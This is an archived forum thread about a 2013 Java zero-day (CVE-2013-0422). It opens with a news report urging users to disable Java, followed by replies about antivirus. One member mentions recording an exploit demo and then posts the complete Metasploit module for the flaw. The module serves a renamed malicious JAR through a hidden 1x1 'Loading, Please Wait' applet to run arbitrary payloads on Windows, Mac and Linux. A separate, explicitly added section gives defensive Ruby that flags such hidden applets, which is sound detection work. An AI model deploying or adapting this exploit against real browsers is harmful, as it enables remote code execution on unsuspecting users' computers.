You are viewing our Forum Archives. To view or take place in current topics click here.
Experts urge PC users to disable Java, cite security flaw
Posted:
Status: Offline
Joined: Feb 03, 2010 (14 Year Member)
Posts: 8,036
Reputation Power: 1128
Computer users are being advised by security experts to disable Oracle's widely used Java software after a security flaw was discovered in the past day that they say hackers are exploiting to attack computers.
"Java is a mess. It's not secure," said Jaime Blasco, Labs Manager with AlienVault Labs. "You have to disable it."
Java, which is installed on hundreds of millions of PCs around the globe, is a computer language that enables programmers to write software using just one set of code that will run on virtually any type of computer.
It is used so that web developers can make sites accessible from browsers running on Microsoft Windows PCs or Apple Macs.
Computer users access those programs through modules, or plug-ins, that run Java software on top of browsers such as Internet Explorer and Firefox.
The US Department of Homeland Security also said people should stop using Java software.
"This vulnerability is being attacked in the wild, and is reported to be incorporated into exploit kits," the department's Computer Emergency Readiness Team (CERT) said in a notice on its website. "We are currently unaware of a practical solution to this problem."
The recommended solution was to disable Java. Three computer security experts also said computer users should disable those Java modules to protect themselves from attack.
A spokeswoman for Oracle said she could not immediately comment on the matter.
"This is like open hunting season on consumers," said HD Moore, chief security officer with Rapid7, a company that helps businesses identify critical security vulnerabilities in their networks.
Moore said machines running on Mac OS X, Linux or Windows all appear to be vulnerable to attack.
Marc Maiffret, chief technology officer with BeyondTrust, said businesses may need to keep using Java to access some websites and internet-based programs that run on the technology.
"The challenge is mainly for businesses, however, which have to use it for some applications," he said. "Oracle simply needs to do a lot more to secure Java and get their act together."
Security experts said the risk of attack is currently high because developers of several popular tools known as exploit kits that criminals use to attack PCs have added software that allows hackers to exploit the newly discovered bug in Java to attack computers.
#2. Posted:
Status: Offline
Joined: Apr 28, 2009 (15 Year Member)
Posts: 2,356
Reputation Power: 45
Oh dear, thanks for the heads up.
- 0 useful
- 0 not useful
#3. Posted:
Status: Offline
Joined: Jun 14, 2009 (15 Year Member)
Posts: 1,181
Reputation Power: 51
I'm not disabling Java. I'll just be extra careful on which sites I visit.
- 0 useful
- 0 not useful
#4. Posted:
Status: Offline
Joined: Jul 18, 2010 (14 Year Member)
Posts: 1,609
Reputation Power: 73
cheeze wrote:
    I'm not disabling Java. I'll just be extra careful on which sites I visit.
I advise you to get Malwarebytes. Even the free one blocks any unwanted traffic. It's brilliant.
And by the way, there used to be a sticky on this some time back, unless it's another problem. But thanks anyway!
- 0 useful
- 0 not useful
#5. Posted:
Status: Offline
Joined: Dec 05, 2010 (13 Year Member)
Posts: 2,130
Reputation Power: 103
Diaboli wrote:
    cheeze wrote:
        I'm not disabling Java. I'll just be extra careful on which sites I visit.
    I advise you to get Malwarebytes. Even the free one blocks any unwanted traffic. It's brilliant.
    And by the way, there used to be a sticky on this some time back, unless it's another problem. But thanks anyway!
Sad thing is, with the newer Java exploits, Malwarebytes, Avast, as well as MSE and many of the other popular AV/personal security software tools do not detect the new browser hijack and payload deployment. The sticky on Java was for a 2010 exploit; this is a new Java session handler vulnerability that finally made it to the public's attention after being around for a year. But don't worry, there are plenty of security issues that have not been spoken of as of yet that AV and IDS systems don't know to even look for as of yet.
Don't feel too safe behind your AV or browser security; it can only detect and stop what it has been told to by its developers.
*Just got done making a video of one of the new Java exploits done through SET. It is the more likely to get noticed by the user, but I don't have the time to do the stealth exploits at the moment. I'll post the video when it's done uploading.
This was done with Avast, MSE, and Malwarebytes installed and updated as of this morning.
- 1 useful
- 0 not useful
#6. Posted:
Status: Offline
Joined: Dec 05, 2010 (13 Year Member)
Posts: 2,130
Reputation Power: 103
#7. Posted:
Status: Offline
Joined: Dec 05, 2010 (13 Year Member)
Posts: 2,130
Reputation Power: 103
Figured the model for the Metasploit Framework should go in this thread as well for others to scrutinize for themselves.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Java Applet JMX Remote Code Execution',
      'Description' => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in January of 2013. The
        vulnerability affects Java version 7u10 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # Vulnerability discovery
          'egypt', # Metasploit module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-0422' ],
          [ 'US-CERT-VU', '625617' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
          [ 'URL', 'http://' ] #Who authored the code on ********? I can't read Russian :-(
        ],
      'Platform' => [ 'java', 'win', 'osx', 'linux' ],
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("B.class", @loader_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
- 0 useful
- 0 not useful
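A defensive check for the delivery pattern visible in the module's generate_html (a 1x1 applet backed by a JAR, with the archive and class names randomised on every request), added here as an example and not part of the original thread or of the Metasploit project. Because the names change each time, the check keys on structure instead; the threshold HIDDEN_MAX_PX, the function names and the sample pages are assumptions made for illustration.

```ruby
# Added example: flag <applet> tags that load a JAR into a near-invisible area.
# HIDDEN_MAX_PX is an assumed threshold, not a value taken from the thread.
HIDDEN_MAX_PX = 2

APPLET_TAG = /<applet\b([^>]*)>/i
ATTRIBUTE  = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i

# Parse the attribute string of one tag into a hash with lowercase keys.
def parse_attributes(raw)
  raw.scan(ATTRIBUTE).each_with_object({}) do |(name, dq, sq, bare), attrs|
    attrs[name.downcase] = dq || sq || bare
  end
end

# True only for an explicit pixel size at or below the threshold;
# a missing or percentage size is not treated as hidden.
def hidden_dimension?(value)
  px = value.to_s[/\A\s*(\d+)\s*(?:px)?\s*\z/i, 1]
  !px.nil? && px.to_i <= HIDDEN_MAX_PX
end

# Return one finding per applet that is JAR-backed and effectively invisible.
def suspicious_applets(html)
  html.scan(APPLET_TAG).flatten.filter_map do |raw|
    attrs = parse_attributes(raw)
    next unless attrs['archive'].to_s.match?(/\.jar\z/i)
    next unless hidden_dimension?(attrs['width']) && hidden_dimension?(attrs['height'])
    { archive: attrs['archive'], code: attrs['code'] }
  end
end

# Constructed samples: the first mirrors the landing-page shape shown in the
# module above (random names, 1x1 applet); the second is an ordinary visible applet.
SAMPLE_HIDDEN = '<html><body><applet archive="kQzWmTpa.jar" ' \
                'code="hGtRvLs.class" width="1" height="1"></applet></body></html>'
SAMPLE_VISIBLE = '<applet archive="chart.jar" code="Chart.class" ' \
                 'width="640" height="480"></applet>'

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_HIDDEN, SAMPLE_VISIBLE].each { |page| p suspicious_applets(page) }
end
```

The same structural test can run in a proxy or mail gateway over fetched HTML; it flags the page before any JAR is requested, independent of whether an AV signature exists for the archive.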